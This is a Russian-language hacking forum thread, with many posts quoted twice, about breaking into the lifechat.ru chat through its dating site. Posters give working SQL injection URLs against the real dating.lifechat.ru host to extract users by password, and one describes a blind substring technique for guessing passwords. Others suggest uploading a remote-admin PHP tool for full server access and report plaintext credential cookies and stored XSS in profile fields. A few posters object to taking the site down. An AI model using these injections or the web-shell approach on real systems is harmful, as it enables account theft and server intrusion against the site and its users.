Еесть чат www.lifechat.ru как мы все знаем сломать чат на движке проблематично,но мы можем сломать этот чат через службу знакомств на этом же сервре где и чат вот ссылка на знакомства: http://dating.lifechat.ru/

и к чему ты это написал?

и к чему ты это написал?

А ктому что можно попробовать сломать....

А ктому что можно попробовать сломать....
ну вот и пробуй сам.как сломаеш напишеш.

_http://dating.lifechat.ru/view.php?rand=1'
Но это уже не ко мне, а к ZaCo

зачем зако когда есть его замеситель =))))
http://dating.lifechat.ru/view.php?rand=99999999999+or+(pass=123)/*
выдаст юзера у кого пароль 123, проверил, все подходит.

http://dating.lifechat.ru/view.php?rand=99999999999+or+(id=442)+and(pass=123 )/*

если будешь перебирать все возможные пароли то ты получишь пароль от тестового аккаунта(он первый)? вдруг этот пароль еще куда нить подойдет, заметь пароли могут быть не только в цифромов виде, можешь еще помучаться с (ascii(substring(pass,0,1))<100
вообщем вариантов много, жалко union и select не пашут

зачем зако когда есть его замеситель =))))
http://dating.lifechat.ru/view.php?rand=99999999999+or+(pass=123)/*
выдаст юзера у кого пароль 123, проверил, все подходит.

http://dating.lifechat.ru/view.php?rand=99999999999+or+(id=442)+and(pass=123 )/*

если будешь перебирать все возможные пароли то ты получишь пароль от тестового аккаунта(он первый)? вдруг этот пароль еще куда нить подойдет, заметь пароли могут быть не только в цифромов виде, можешь еще помучаться с (ascii(substring(pass,0,1))<100
вообщем вариантов много, жалко union и select не пашут

Отлчино,а теперь можно попробовать взломать этот чат через сайт знакомств. Есть такая программа если ее залить на сервер то можно иметь полный доступ к серверу и чату: http://php.spb.ru/remview/

Отлчино,а теперь можно попробовать взломать этот чат через сайт знакомств. Есть такая программа если ее залить на сервер то можно иметь полный доступ к серверу и чату: http://php.spb.ru/remview/

ну нехера себе, где достал, она же приватная и стоит 500$ ты крут. научи пользоваться....
ты ниибацо крут, тебе надо ты и ломай, тебе дали уязвимость, показали как пользоваться, сиди и ломай, этот чат никому нах не нужен, тока себя потешить

ну нехера себе, где достал, она же приватная и стоит 500$ ты крут. научи пользоваться....
ты ниибацо крут, тебе надо ты и ломай, тебе дали уязвимость, показали как пользоваться, сиди и ломай, этот чат никому нах не нужен, тока себя потешить

Так вот давайте потешимся.

кому нуда уже все потешились, дальше что?

кому нуда уже все потешились, дальше что?

Дальше лучше,плохо потешились если чат был положили, тогда бы точно потешились.

Там в куках логин-пароль храняться в открытом виде.
При создании анкеты поля "О себе:" и "Кого ищу:" не фильруют теги (активная XSS)
http://dating.lifechat.ru/view.php?id=553&sex=1

Дальше лучше,плохо потешились если чат был положили, тогда бы точно потешились.
artkino - это кому больше надо? Тебе или нам? От этого чата и от знакомств не тепло не холодно. И зачем что-то сносить и вообще заниматься дестроем? Чтобы людям насолить? За что? А если они лучше тебя?

Там в куках логин-пароль храняться в открытом виде.
При создании анкеты поля "О себе:" и "Кого ищу:" не фильруют теги (активная XSS)
http://dating.lifechat.ru/view.php?id=553&sex=1


artkino - это кому больше надо? Тебе или нам? От этого чата и от знакомств не тепло не холодно. И зачем что-то сносить и вообще заниматься дестроем? Чтобы людям насолить? За что? А если они лучше тебя?


Там админ нехороший человек......

За что? А если они лучше тебя?
они лучше него, знаком с обоими админами, отличные парни.

closed?

Хех да закрывайте тему.